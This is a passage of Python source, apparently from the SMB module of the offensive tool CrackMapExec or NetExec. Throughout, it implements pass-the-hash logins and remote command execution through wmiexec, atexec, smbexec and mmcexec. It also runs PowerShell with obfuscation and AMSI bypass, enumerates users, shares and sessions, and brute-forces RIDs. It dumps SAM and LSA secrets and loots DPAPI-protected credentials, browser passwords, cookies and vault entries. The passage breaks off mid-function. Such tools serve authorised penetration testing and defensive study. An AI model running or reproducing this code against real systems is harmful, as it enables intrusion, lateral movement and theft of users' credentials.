except SessionError as e:
error, desc = e.getErrorString()
self.logger.fail(
f'{domain}\\{self.username}:{process_secret(self.password )} {error} {f"({desc})" if self.args.verbose else ""}',
color="magenta" if error in smb_error_status else "red",
)
if error not in smb_error_status:
self.inc_failed_login(username)
return False
except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:
self.logger.fail(f"Connection Error: {e}")
return False
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
return False
def hash_login(self, domain, username, ntlm_hash):
# Re-connect since we logged off
self.create_conn_obj()
lmhash = ""
nthash = ""
try:
if not self.args.laps:
self.username = username
# This checks to see if we didn't provide the LM Hash
if ntlm_hash.find(":") != -1:
lmhash, nthash = ntlm_hash.split(":")
self.hash = nthash
else:
nthash = ntlm_hash
self.hash = ntlm_hash
if lmhash:
self.lmhash = lmhash
if nthash:
self.nthash = nthash
else:
nthash = self.hash
self.domain = domain
self.conn.login(self.username, "", domain, lmhash, nthash)
self.check_if_admin()
user_id = self.db.add_credential("hash", domain, self.username, nthash)
host_id = self.db.get_hosts(self.host)[0].id
self.db.add_loggedin_relation(user_id, host_id)
if self.admin_privs:
self.db.add_admin_user("hash", domain, self.username, nthash, self.host, user_id=user_id)
out = f"{domain}\\{self.username}:{process_secret(self.hash)} {self.mark_pwned()}"
self.logger.success(out)
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
# check https://github.com/byt3bl33d3r/CrackMapExec/issues/321
if self.args.continue_on_success and self.signing:
try:
self.conn.logoff()
except:
pass
self.create_conn_obj()
return True
except SessionError as e:
error, desc = e.getErrorString()
self.logger.fail(
f"{domain}\\{self.username}:{process_secret(self.hash)} {error} {f'({desc})' if self.args.verbose else ''}",
color="magenta" if error in smb_error_status else "red",
)
if error not in smb_error_status:
self.inc_failed_login(self.username)
return False
except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:
self.logger.fail(f"Connection Error: {e}")
return False
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
return False
def create_smbv1_conn(self, kdc=""):
try:
self.conn = SMBConnection(
self.host if not kdc else kdc,
self.host if not kdc else kdc,
None,
self.args.port,
preferredDialect=SMB_DIALECT,
timeout=self.args.smb_timeout,
)
self.smbv1 = True
except socket.error as e:
if str(e).find("Connection reset by peer") != -1:
self.logger.info(f"SMBv1 might be disabled on {self.host if not kdc else kdc}")
return False
except (Exception, NetBIOSTimeout) as e:
self.logger.info(f"Error creating SMBv1 connection to {self.host if not kdc else kdc}: {e}")
return False
return True
def create_smbv3_conn(self, kdc=""):
try:
self.conn = SMBConnection(
self.host if not kdc else kdc,
self.host if not kdc else kdc,
None,
self.args.port,
timeout=self.args.smb_timeout,
)
self.smbv1 = False
except socket.error as e:
# This should not happen anymore!!!
if str(e).find("Too many open files") != -1:
if not self.logger:
print("DEBUG ERROR: logger not set, please open an issue on github: " + str(self) + str(self.logger))
self.proto_logger()
self.logger.fail(f"SMBv3 connection error on {self.host if not kdc else kdc}: {e}")
return False
except (Exception, NetBIOSTimeout) as e:
self.logger.info(f"Error creating SMBv3 connection to {self.host if not kdc else kdc}: {e}")
return False
return True
def create_conn_obj(self, kdc=""):
if self.create_smbv1_conn(kdc):
return True
elif self.create_smbv3_conn(kdc):
return True
return False
def check_if_admin(self):
rpctransport = SMBTransport(self.conn.getRemoteHost(), 445, r"\svcctl", smb_connection=self.conn)
dce = rpctransport.get_dce_rpc()
try:
dce.connect()
except:
pass
else:
try:
dce.bind(scmr.MSRPC_UUID_SCMR)
except:
pass
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F)
self.admin_privs = True
except scmr.DCERPCException:
self.admin_privs = False
pass
return
def gen_relay_list(self):
if self.server_os.lower().find("windows") != -1 and self.signing is False:
with sem:
with open(self.args.gen_relay_list, "a+") as relay_list:
if self.host not in relay_list.read():
relay_list.write(self.host + "\n")
@requires_admin
# @requires_smb_server
def execute(self, payload=None, get_output=False, methods=None):
if self.args.exec_method:
methods = [self.args.exec_method]
if not methods:
methods = ["wmiexec", "atexec", "smbexec", "mmcexec"]
if not payload and self.args.execute:
payload = self.args.execute
if not self.args.no_output:
get_output = True
current_method = ""
for method in methods:
current_method = method
if method == "wmiexec":
try:
exec_method = WMIEXEC(
self.host if not self.kerberos else self.hostname + "." + self.domain,
self.smb_share_name,
self.username,
self.password,
self.domain,
self.conn,
self.kerberos,
self.aesKey,
self.kdcHost,
self.hash,
self.args.share,
logger=self.logger,
timeout=self.args.dcom_timeout,
tries=self.args.get_output_tries
)
self.logger.info("Executed command via wmiexec")
break
except:
self.logger.debug("Error executing command via wmiexec, traceback:")
self.logger.debug(format_exc())
continue
elif method == "mmcexec":
try:
exec_method = MMCEXEC(
self.host if not self.kerberos else self.hostname + "." + self.domain,
self.smb_share_name,
self.username,
self.password,
self.domain,
self.conn,
self.args.share,
self.hash,
self.logger,
self.args.get_output_tries,
self.args.dcom_timeout
)
self.logger.info("Executed command via mmcexec")
break
except:
self.logger.debug("Error executing command via mmcexec, traceback:")
self.logger.debug(format_exc())
continue
elif method == "atexec":
try:
exec_method = TSCH_EXEC(
self.host if not self.kerberos else self.hostname + "." + self.domain,
self.smb_share_name,
self.username,
self.password,
self.domain,
self.kerberos,
self.aesKey,
self.kdcHost,
self.hash,
self.logger,
self.args.get_output_tries
) # self.args.share)
self.logger.info("Executed command via atexec")
break
except:
self.logger.debug("Error executing command via atexec, traceback:")
self.logger.debug(format_exc())
continue
elif method == "smbexec":
try:
exec_method = SMBEXEC(
self.host if not self.kerberos else self.hostname + "." + self.domain,
self.smb_share_name,
self.conn,
self.args.port,
self.username,
self.password,
self.domain,
self.kerberos,
self.aesKey,
self.kdcHost,
self.hash,
self.args.share,
self.args.port,
self.logger,
self.args.get_output_tries
)
self.logger.info("Executed command via smbexec")
break
except:
self.logger.debug("Error executing command via smbexec, traceback:")
self.logger.debug(format_exc())
continue
if hasattr(self, "server"):
self.server.track_host(self.host)
if "exec_method" in locals():
output = exec_method.execute(payload, get_output)
try:
if not isinstance(output, str):
output = output.decode(self.args.codec)
except UnicodeDecodeError:
self.logger.debug("Decoding error detected, consider running chcp.com at the target, map the result with https://docs.python.org/3/library/codecs.html#standard-encodings")
output = output.decode("cp437")
output = output.strip()
self.logger.debug(f"Output: {output}")
if (self.args.execute or self.args.ps_execute) and output:
self.logger.success(f"Executed command via {current_method}")
buf = StringIO(output).readlines()
for line in buf:
self.logger.highlight(line.strip())
return output
else:
self.logger.fail(f"Execute command failed with {current_method}")
return False
@requires_admin
def ps_execute(
self,
payload=None,
get_output=False,
methods=None,
force_ps32=False,
dont_obfs=False,
):
response = []
if not payload and self.args.ps_execute:
payload = self.args.ps_execute
if not self.args.no_output:
get_output = True
amsi_bypass = self.args.amsi_bypass[0] if self.args.amsi_bypass else None
if os.path.isfile(payload):
with open(payload) as commands:
for c in commands:
response.append(
self.execute(
create_ps_command(
c,
force_ps32=force_ps32,
dont_obfs=dont_obfs,
custom_amsi=amsi_bypass,
),
get_output,
methods,
)
)
else:
response = [
self.execute(
create_ps_command(
payload,
force_ps32=force_ps32,
dont_obfs=dont_obfs,
custom_amsi=amsi_bypass,
),
get_output,
methods,
)
]
return response
def shares(self):
temp_dir = ntpath.normpath("\\" + gen_random_string())
permissions = []
try:
self.logger.debug(f"domain: {self.domain}")
user_id = self.db.get_user(self.domain.upper(), self.username)[0][0]
except Exception as e:
error = get_error_string(e)
self.logger.fail(f"Error getting user: {error}")
pass
try:
shares = self.conn.listShares()
self.logger.info(f"Shares returned: {shares}")
except SessionError as e:
error = get_error_string(e)
self.logger.fail(
f"Error enumerating shares: {error}",
color="magenta" if error in smb_error_status else "red",
)
return permissions
except Exception as e:
error = get_error_string(e)
self.logger.fail(
f"Error enumerating shares: {error}",
color="magenta" if error in smb_error_status else "red",
)
return permissions
for share in shares:
share_name = share["shi1_netname"][:-1]
share_remark = share["shi1_remark"][:-1]
share_info = {"name": share_name, "remark": share_remark, "access": []}
read = False
write = False
try:
self.conn.listPath(share_name, "*")
read = True
share_info["access"].append("READ")
except SessionError as e:
error = get_error_string(e)
self.logger.debug(f"Error checking READ access on share: {error}")
pass
if not self.args.no_write_check:
try:
self.conn.createDirectory(share_name, temp_dir)
self.conn.deleteDirectory(share_name, temp_dir)
write = True
share_info["access"].append("WRITE")
except SessionError as e:
error = get_error_string(e)
self.logger.debug(f"Error checking WRITE access on share: {error}")
pass
permissions.append(share_info)
if share_name != "IPC$":
try:
# TODO: check if this already exists in DB before adding
self.db.add_share(self.hostname, user_id, share_name, share_remark, read, write)
except Exception as e:
error = get_error_string(e)
self.logger.debug(f"Error adding share: {error}")
pass
self.logger.display("Enumerated shares")
self.logger.highlight(f"{'Share':<15} {'Permissions':<15} {'Remark'}")
self.logger.highlight(f"{'-----':<15} {'-----------':<15} {'------'}")
for share in permissions:
name = share["name"]
remark = share["remark"]
perms = share["access"]
if self.args.filter_shares and not any(x in perms for x in self.args.filter_shares):
continue
self.logger.highlight(f"{name:<15} {','.join(perms):<15} {remark}")
return permissions
def get_dc_ips(self):
dc_ips = []
for dc in self.db.get_domain_controllers(domain=self.domain):
dc_ips.append(dc[1])
if not dc_ips:
dc_ips.append(self.host)
return dc_ips
def sessions(self):
try:
sessions = get_netsession(
self.host,
self.domain,
self.username,
self.password,
self.lmhash,
self.nthash,
)
self.logger.display("Enumerated sessions")
for session in sessions:
if session.sesi10_cname.find(self.local_ip) == -1:
self.logger.highlight(f"{session.sesi10_cname:<25} User:{session.sesi10_username}")
return sessions
except:
pass
def disks(self):
disks = []
try:
disks = get_localdisks(
self.host,
self.domain,
self.username,
self.password,
self.lmhash,
self.nthash,
)
self.logger.display("Enumerated disks")
for disk in disks:
self.logger.highlight(disk.disk)
except Exception as e:
error, desc = e.getErrorString()
self.logger.fail(
f"Error enumerating disks: {error}",
color="magenta" if error in smb_error_status else "red",
)
return disks
def local_groups(self):
groups = []
# To enumerate local groups the DC IP is optional
# if specified it will resolve the SIDs and names of any domain accounts in the local group
for dc_ip in self.get_dc_ips():
try:
groups = get_netlocalgroup(
self.host,
dc_ip,
"",
self.username,
self.password,
self.lmhash,
self.nthash,
queried_groupname=self.args.local_groups,
list_groups=True if not self.args.local_groups else False,
recurse=False,
)
if self.args.local_groups:
self.logger.success("Enumerated members of local group")
else:
self.logger.success("Enumerated local groups")
for group in groups:
if group.name:
if not self.args.local_groups:
self.logger.highlight(f"{group.name:<40} membercount: {group.membercount}")
group_id = self.db.add_group(
self.hostname,
group.name,
member_count_ad=group.membercount,
)[0]
else:
domain, name = group.name.split("/")
self.logger.highlight(f"domain: {domain}, name: {name}")
self.logger.highlight(f"{domain.upper()}\\{name}")
try:
group_id = self.db.get_groups(
group_name=self.args.local_groups,
group_domain=domain,
)[
0
][0]
except IndexError:
group_id = self.db.add_group(
domain,
self.args.local_groups,
member_count_ad=group.membercount,
)[0]
# yo dawg, I hear you like groups.
# So I put a domain group as a member of a local group which is also a member of another local group.
# (╯°□°)╯︵ ┻━┻
if not group.isgroup:
self.db.add_credential("plaintext", domain, name, "", group_id, "")
elif group.isgroup:
self.db.add_group(domain, name, member_count_ad=group.membercount)
break
except Exception as e:
self.logger.fail(f"Error enumerating local groups of {self.host}: {e}")
self.logger.display("Trying with SAMRPC protocol")
groups = SamrFunc(self).get_local_groups()
if groups:
self.logger.success("Enumerated local groups")
self.logger.debug(f"Local groups: {groups}")
for group_name, group_rid in groups.items():
self.logger.highlight(f"rid => {group_rid} => {group_name}")
group_id = self.db.add_group(self.hostname, group_name, rid=group_rid)[0]
self.logger.debug(f"Added group, returned id: {group_id}")
return groups
def domainfromdsn(self, dsn):
dsnparts = dsn.split(",")
domain = ""
for part in dsnparts:
k, v = part.split("=")
if k == "DC":
if domain == "":
domain = v
else:
domain = domain + "." + v
return domain
def domainfromdnshostname(self, dns):
dnsparts = dns.split(".")
domain = ".".join(dnsparts[1:])
return domain, dnsparts[0] + "$"
def groups(self):
groups = []
for dc_ip in self.get_dc_ips():
if self.args.groups:
try:
groups = get_netgroupmember(
dc_ip,
self.domain,
self.username,
password=self.password,
lmhash=self.lmhash,
nthash=self.nthash,
queried_groupname=self.args.groups,
queried_sid=str(),
queried_domain=str(),
ads_path=str(),
recurse=False,
use_matching_rule=False,
full_data=False,
custom_filter=str(),
)
self.logger.success("Enumerated members of domain group")
for group in groups:
member_count = len(group.member) if hasattr(group, "member") else 0
self.logger.highlight(f"{group.memberdomain}\\{group.membername}")
try:
group_id = self.db.get_groups(
group_name=self.args.groups,
group_domain=group.groupdomain,
)[
0
][0]
except IndexError:
group_id = self.db.add_group(
group.groupdomain,
self.args.groups,
member_count_ad=member_count,
)[0]
if not group.isgroup:
self.db.add_credential(
"plaintext",
group.memberdomain,
group.membername,
"",
group_id,
"",
)
elif group.isgroup:
group_id = self.db.add_group(
group.groupdomain,
group.groupname,
member_count_ad=member_count,
)[0]
break
except Exception as e:
self.logger.fail(f"Error enumerating domain group members using dc ip {dc_ip}: {e}")
else:
try:
groups = get_netgroup(
dc_ip,
self.domain,
self.username,
password=self.password,
lmhash=self.lmhash,
nthash=self.nthash,
queried_groupname=str(),
queried_sid=str(),
queried_username=str(),
queried_domain=str(),
ads_path=str(),
admin_count=False,
full_data=True,
custom_filter=str(),
)
self.logger.success("Enumerated domain group(s)")
for group in groups:
member_count = len(group.member) if hasattr(group, "member") else 0
self.logger.highlight(f"{group.samaccountname:<40} membercount: {member_count}")
if bool(group.isgroup) is True:
# Since there isn't a groupmember attribute on the returned object from get_netgroup
# we grab it from the distinguished name
domain = self.domainfromdsn(group.distinguishedname)
group_id = self.db.add_group(
domain,
group.samaccountname,
member_count_ad=member_count,
)[0]
break
except Exception as e:
self.logger.fail(f"Error enumerating domain group using dc ip {dc_ip}: {e}")
return groups
def users(self):
self.logger.display("Trying to dump local users with SAMRPC protocol")
users = UserSamrDump(self).dump()
return users
def hosts(self):
hosts = []
for dc_ip in self.get_dc_ips():
try:
hosts = get_netcomputer(
dc_ip,
self.domain,
self.username,
password=self.password,
lmhash=self.lmhash,
nthash=self.nthash,
queried_domain="",
ads_path=str(),
custom_filter=str(),
)
self.logger.success("Enumerated domain computer(s)")
for hosts in hosts:
domain, host_clean = self.domainfromdnshostname(hosts.dnshostname)
self.logger.highlight(f"{domain}\\{host_clean:<30}")
break
except Exception as e:
self.logger.fail(f"Error enumerating domain hosts using dc ip {dc_ip}: {e}")
break
return hosts
def loggedon_users(self):
logged_on = []
try:
logged_on = get_netloggedon(
self.host,
self.domain,
self.username,
self.password,
lmhash=self.lmhash,
nthash=self.nthash,
)
self.logger.success("Enumerated logged_on users")
if self.args.loggedon_users_filter:
for user in logged_on:
if re.match(self.args.loggedon_users_filter, user.wkui1_username):
self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}")
else:
for user in logged_on:
self.logger.highlight(f"{user.wkui1_logon_domain}\\{user.wkui1_username:<25} {f'logon_server: {user.wkui1_logon_server}' if user.wkui1_logon_server else ''}")
except Exception as e:
self.logger.fail(f"Error enumerating logged on users: {e}")
return logged_on
def pass_pol(self):
return PassPolDump(self).dump()
@requires_admin
def wmi(self, wmi_query=None, namespace=None):
records = []
if not wmi_query:
wmi_query = self.args.wmi.strip('\n')
if not namespace:
namespace = self.args.wmi_namespace
try:
dcom = DCOMConnection(
self.host if not self.kerberos else self.hostname + "." + self.domain,
self.username,
self.password,
self.domain,
self.lmhash,
self.nthash,
oxidResolver=True,
doKerberos=self.kerberos,
kdcHost=self.kdcHost,
aesKey=self.aesKey
)
iInterface = dcom.CoCreateInstanceEx(CLSID_WbemLevel1Login,IID_IWbemLevel1Login)
flag, stringBinding = dcom_FirewallChecker(iInterface, self.args.dcom_timeout)
if not flag or not stringBinding:
error_msg = f'WMI Query: Dcom initialization failed on connection with stringbinding: "{stringBinding}", please increase the timeout with the option "--dcom-timeout". If it\'s still failing maybe something is blocking the RPC connection, try another exec method'
if not stringBinding:
error_msg = "WMI Query: Dcom initialization failed: can't get target stringbinding, maybe cause by IPv6 or any other issues, please check your target again"
self.logger.fail(error_msg) if not flag else self.logger.debug(error_msg)
# Make it force break function
dcom.disconnect()
iWbemLevel1Login = IWbemLevel1Login(iInterface)
iWbemServices= iWbemLevel1Login.NTLMLogin(namespace , NULL, NULL)
iWbemLevel1Login.RemRelease()
iEnumWbemClassObject = iWbemServices.ExecQuery(wmi_query)
except Exception as e:
self.logger.fail('Execute WQL error: {}'.format(e))
if "iWbemLevel1Login" in locals():
dcom.disconnect()
else:
self.logger.info(f"Executing WQL syntax: {wmi_query}")
while True:
try:
wmi_results = iEnumWbemClassObject.Next(0xffffffff, 1)[0]
record = wmi_results.getProperties()
records.append(record)
for k,v in record.items():
self.logger.highlight(f"{k} => {v['value']}")
except Exception as e:
if str(e).find('S_FALSE') < 0:
raise e
else:
break
dcom.disconnect()
return records if records else False
def spider(
self,
share=None,
folder=".",
pattern=[],
regex=[],
exclude_dirs=[],
depth=None,
content=False,
only_files=True,
):
spider = SMBSpider(self.conn, self.logger)
self.logger.display("Started spidering")
start_time = time()
if not share:
spider.spider(
self.args.spider,
self.args.spider_folder,
self.args.pattern,
self.args.regex,
self.args.exclude_dirs,
self.args.depth,
self.args.content,
self.args.only_files,
)
else:
spider.spider(share, folder, pattern, regex, exclude_dirs, depth, content, only_files)
self.logger.display(f"Done spidering (Completed in {time() - start_time})")
return spider.results
def rid_brute(self, max_rid=None):
entries = []
if not max_rid:
max_rid = int(self.args.rid_brute)
KNOWN_PROTOCOLS = {
135: {"bindstr": r"ncacn_ip_tcp:%s", "set_host": False},
139: {"bindstr": r"ncacn_np:{}[\pipe\lsarpc]", "set_host": True},
445: {"bindstr": r"ncacn_np:{}[\pipe\lsarpc]", "set_host": True},
}
try:
full_hostname = self.host if not self.kerberos else self.hostname + "." + self.domain
string_binding = KNOWN_PROTOCOLS[self.args.port]["bindstr"]
logging.debug(f"StringBinding {string_binding}")
rpc_transport = transport.DCERPCTransportFactory(string_binding)
rpc_transport.set_dport(self.args.port)
if KNOWN_PROTOCOLS[self.args.port]["set_host"]:
rpc_transport.setRemoteHost(full_hostname)
if hasattr(rpc_transport, "set_credentials"):
# This method exists only for selected protocol sequences.
rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash, self.aesKey)
if self.kerberos:
rpc_transport.set_kerberos(self.kerberos, self.kdcHost)
dce = rpc_transport.get_dce_rpc()
if self.kerberos:
dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)
dce.connect()
except Exception as e:
self.logger.fail(f"Error creating DCERPC connection: {e}")
return entries
# Want encryption? Uncomment next line
# But make simultaneous variable <= 100
# dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
# Want fragmentation? Uncomment next line
# dce.set_max_fragment_size(32)
dce.bind(lsat.MSRPC_UUID_LSAT)
try:
resp = lsad.hLsarOpenPolicy2(dce, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
except lsad.DCERPCSessionError as e:
self.logger.fail(f"Error connecting: {e}")
return entries
policy_handle = resp["PolicyHandle"]
resp = lsad.hLsarQueryInformationPolicy2(
dce,
policy_handle,
lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation,
)
domain_sid = resp["PolicyInformation"]["PolicyAccountDomainInfo"]["DomainSid"].formatCanonical()
so_far = 0
simultaneous = 1000
for j in range(max_rid // simultaneous + 1):
if (max_rid - so_far) // simultaneous == 0:
sids_to_check = (max_rid - so_far) % simultaneous
else:
sids_to_check = simultaneous
if sids_to_check == 0:
break
sids = list()
for i in range(so_far, so_far + sids_to_check):
sids.append(f"{domain_sid}-{i:d}")
try:
lsat.hLsarLookupSids(dce, policy_handle, sids, lsat.LSAP_LOOKUP_LEVEL.LsapLookupWksta)
except DCERPCException as e:
if str(e).find("STATUS_NONE_MAPPED") >= 0:
so_far += simultaneous
continue
elif str(e).find("STATUS_SOME_NOT_MAPPED") >= 0:
resp = e.get_packet()
else:
raise
for n, item in enumerate(resp["TranslatedNames"]["Names"]):
if item["Use"] != SID_NAME_USE.SidTypeUnknown:
rid = so_far + n
domain = resp["ReferencedDomains"]["Domains"][item["DomainIndex"]]["Name"]
user = item["Name"]
sid_type = SID_NAME_USE.enumItems(item["Use"]).name
self.logger.highlight(f"{rid}: {domain}\\{user} ({sid_type})")
entries.append(
{
"rid": rid,
"domain": domain,
"username": user,
"sidtype": sid_type,
}
)
so_far += simultaneous
dce.disconnect()
return entries
def put_file(self):
self.logger.display(f"Copying {self.args.put_file[0]} to {self.args.put_file[1]}")
with open(self.args.put_file[0], "rb") as file:
try:
self.conn.putFile(self.args.share, self.args.put_file[1], file.read)
self.logger.success(f"Created file {self.args.put_file[0]} on \\\\{self.args.share}\\{self.args.put_file[1]}")
except Exception as e:
self.logger.fail(f"Error writing file to share {self.args.share}: {e}")
def get_file(self):
share_name = self.args.share
remote_path = self.args.get_file[0]
download_path = self.args.get_file[1]
self.logger.display(f'Copying "{remote_path}" to "{download_path}"')
if self.args.append_host:
download_path = f"{self.hostname}-{remote_path}"
with open(download_path, "wb+") as file:
try:
self.conn.getFile(share_name, remote_path, file.write)
self.logger.success(f'File "{remote_path}" was downloaded to "{download_path}"')
except Exception as e:
self.logger.fail(f'Error writing file "{remote_path}" from share "{share_name}": {e}')
if os.path.getsize(download_path) == 0:
os.remove(download_path)
def enable_remoteops(self):
if self.remote_ops is not None and self.bootkey is not None:
return
try:
self.remote_ops = RemoteOperations(self.conn, self.kerberos, self.kdcHost)
self.remote_ops.enableRegistry()
self.bootkey = self.remote_ops.getBootKey()
except Exception as e:
self.logger.fail(f"RemoteOperations failed: {e}")
@requires_admin
def sam(self):
try:
self.enable_remoteops()
host_id = self.db.get_hosts(filter_term=self.host)[0][0]
def add_sam_hash(sam_hash, host_id):
add_sam_hash.sam_hashes += 1
self.logger.highlight(sam_hash)
username, _, lmhash, nthash, _, _, _ = sam_hash.split(":")
self.db.add_credential(
"hash",
self.hostname,
username,
":".join((lmhash, nthash)),
pillaged_from=host_id,
)
add_sam_hash.sam_hashes = 0
if self.remote_ops and self.bootkey:
SAM_file_name = self.remote_ops.saveSAM()
SAM = SAMHashes(
SAM_file_name,
self.bootkey,
isRemote=True,
perSecretCallback=lambda secret: add_sam_hash(secret, host_id),
)
self.logger.display("Dumping SAM hashes")
SAM.dump()
SAM.export(self.output_filename)
self.logger.success(f"Added {highlight(add_sam_hash.sam_hashes)} SAM hashes to the database")
try:
self.remote_ops.finish()
except Exception as e:
self.logger.debug(f"Error calling remote_ops.finish(): {e}")
SAM.finish()
except SessionError as e:
if "STATUS_ACCESS_DENIED" in e.getErrorString():
self.logger.fail("Error \"STATUS_ACCESS_DENIED\" while dumping SAM. This is likely due to an endpoint protection.")
except Exception as e:
self.logger.exception(str(e))
@requires_admin
def dpapi(self):
dump_system = False if "nosystem" in self.args.dpapi else True
logging.getLogger("dploot").disabled = True
if self.args.pvk is not None:
try:
self.pvkbytes = open(self.args.pvk, "rb").read()
self.logger.success(f"Loading domain backupkey from {self.args.pvk}")
except Exception as e:
self.logger.fail(str(e))
masterkeys = []
if self.args.mkfile is not None:
try:
masterkeys += parse_masterkey_file(self.args.mkfile)
except Exception as e:
self.logger.fail(str(e))
if self.pvkbytes is None and self.no_da is None and self.args.local_auth is False:
try:
results = self.db.get_domain_backupkey(self.domain)
except:
self.logger.fail(
"Your version of CMEDB is not up to date, run cmedb and create a new workspace: \
'workspace create dpapi' then re-run the dpapi option"
)
return False
if len(results) > 0:
self.logger.success("Loading domain backupkey from cmedb...")
self.pvkbytes = results[0][2]
else:
try:
dc_target = Target.create(
domain=self.domain,
username=self.username,
password=self.password,
target=self.domain, # querying DNS server for domain will return DC
lmhash=self.lmhash,
nthash=self.nthash,
do_kerberos=self.kerberos,
aesKey=self.aesKey,
no_pass=True,
use_kcache=self.use_kcache,
)
dc_conn = DPLootSMBConnection(dc_target)
dc_conn.connect() # Connect to DC
if dc_conn.is_admin():
self.logger.success("User is Domain Administrator, exporting domain backupkey...")
backupkey_triage = BackupkeyTriage(target=dc_target, conn=dc_conn)
backupkey = backupkey_triage.triage_backupkey()
self.pvkbytes = backupkey.backupkey_v2
self.db.add_domain_backupkey(self.domain, self.pvkbytes)
else:
self.no_da = False
except Exception as e:
self.logger.fail(f"Could not get domain backupkey: {e}")
pass
target = Target.create(
domain=self.domain,
username=self.username,
password=self.password,
target=self.hostname + "." + self.domain if self.kerberos else self.host,
lmhash=self.lmhash,
nthash=self.nthash,
do_kerberos=self.kerberos,
aesKey=self.aesKey,
no_pass=True,
use_kcache=self.use_kcache,
)
try:
conn = DPLootSMBConnection(target)
conn.smb_session = self.conn
except Exception as e:
self.logger.debug(f"Could not upgrade connection: {e}")
return
plaintexts = {username: password for _, _, username, password, _, _ in self.db.get_credentials(cred_type="plaintext")}
nthashes = {username: nt.split(":")[1] if ":" in nt else nt for _, _, username, nt, _, _ in self.db.get_credentials(cred_type="hash")}
if self.password != "":
plaintexts[self.username] = self.password
if self.nthash != "":
nthashes[self.username] = self.nthash
# Collect User and Machine masterkeys
try:
self.logger.display("Collecting User and Machine masterkeys, grab a coffee and be patient...")
masterkeys_triage = MasterkeysTriage(
target=target,
conn=conn,
pvkbytes=self.pvkbytes,
passwords=plaintexts,
nthashes=nthashes,
)
self.logger.debug(f"Masterkeys Triage: {masterkeys_triage}")
masterkeys += masterkeys_triage.triage_masterkeys()
if dump_system:
masterkeys += masterkeys_triage.triage_system_masterkeys()
except Exception as e:
self.logger.debug(f"Could not get masterkeys: {e}")
if len(masterkeys) == 0:
self.logger.fail("No masterkeys looted")
return
self.logger.success(f"Got {highlight(len(masterkeys))} decrypted masterkeys. Looting secrets...")
credentials = []
system_credentials = []
try:
# Collect User and Machine Credentials Manager secrets
credentials_triage = CredentialsTriage(target=target, conn=conn, masterkeys=masterkeys)
self.logger.debug(f"Credentials Triage Object: {credentials_triage}")
credentials = credentials_triage.triage_credentials()
self.logger.debug(f"Triaged Credentials: {credentials}")
if dump_system:
system_credentials = credentials_triage.triage_system_credentials()
self.logger.debug(f"Triaged System Credentials: {system_credentials}")
except Exception as e:
self.logger.debug(f"Error while looting credentials: {e}")
for credential in credentials:
self.logger.highlight(f"[{credential.winuser}][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}")
self.db.add_dpapi_secrets(
target.address,
"CREDENTIAL",
credential.winuser,
credential.username,
credential.password,
credential.target,
)
for credential in system_credentials:
self.logger.highlight(f"[SYSTEM][CREDENTIAL] {credential.target} - {credential.username}:{credential.password}")
self.db.add_dpapi_secrets(
target.address,
"CREDENTIAL",
"SYSTEM",
credential.username,
credential.password,
credential.target,
)
browser_credentials = []
cookies = []
try:
# Collect Chrome Based Browser stored secrets
dump_cookies = True if "cookies" in self.args.dpapi else False
browser_triage = BrowserTriage(target=target, conn=conn, masterkeys=masterkeys)
browser_credentials, cookies = browser_triage.triage_browsers(gather_cookies=dump_cookies)
except Exception as e:
self.logger.debug(f"Error while looting browsers: {e}")
for credential in browser_credentials:
cred_url = credential.url + " -" if credential.url != "" else "-"
self.logger.highlight(f"[{credential.winuser}][{credential.browser.upper()}] {cred_url} {credential.username}:{credential.password}")
self.db.add_dpapi_secrets(
target.address,
credential.browser.upper(),
credential.winuser,
credential.username,
credential.password,
credential.url,
)
if dump_cookies:
self.logger.display("Start Dumping Cookies")
for cookie in cookies:
if cookie.cookie_value != '':
self.logger.highlight(f"[{credential.winuser}][{cookie.browser.upper()}] {cookie.host}{cookie.path} - {cookie.cookie_name}:{cookie.cookie_value}")
self.logger.display("End Dumping Cookies")
vaults = []
try:
# Collect User Internet Explorer stored secrets
vaults_triage = VaultsTriage(target=target, conn=conn, masterkeys=masterkeys)
vaults = vaults_triage.triage_vaults()
except Exception as e:
self.logger.debug(f"Error while looting vaults: {e}")
for vault in vaults:
if vault.type == "Internet Explorer":
resource = vault.resource + " -" if vault.resource != "" else "-"
self.logger.highlight(f"[{vault.winuser}][IEX] {resource} - {vault.username}:{vault.password}")
self.db.add_dpapi_secrets(
target.address,
"IEX",
vault.winuser,
vault.username,
vault.password,
vault.resource,
)
firefox_credentials = []
try:
# Collect Firefox stored secrets
firefox_triage = FirefoxTriage(target=target, logger=self.logger, conn=conn)
firefox_credentials = firefox_triage.run()
except Exception as e:
self.logger.debug(f"Error while looting firefox: {e}")
for credential in firefox_credentials:
url = credential.url + " -" if credential.url != "" else "-"
self.logger.highlight(f"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}")
self.db.add_dpapi_secrets(
target.address,
"FIREFOX",
credential.winuser,
credential.username,
credential.password,
credential.url,
)
@requires_admin
def lsa(self):
try:
self.enable_remoteops()
def add_lsa_secret(secret):
add_lsa_secret.secrets += 1
self.logger.highlight(secret)
if "_SC_GMSA_{84A78B8C" in secret:
gmsa_id = secret.split("_")[4].split(":")[0]
data = bytes.fromhex(secret.split("_")[4].split(":")[1])
blob = MSDS_MANAGEDPASSWORD_BLOB()
blob.fromString(data)
currentPassword = blob["CurrentPassword"][:-2]
ntlm_hash = MD4.new()
ntlm_hash.update(currentPassword)
passwd = binascii.hexlify(ntlm_hash.digest()).decode("utf-8")
self.logger.highlight(f"GMSA ID: {gmsa_id:<20} NTLM: {passwd}")
add_lsa_secret.secrets = 0
if self.remote_ops and self.bootkey:
SECURITYFileName = self.remote_ops.saveSECURITY()
LSA = LSASecrets(
SECURITYFileName,
self.bootkey,
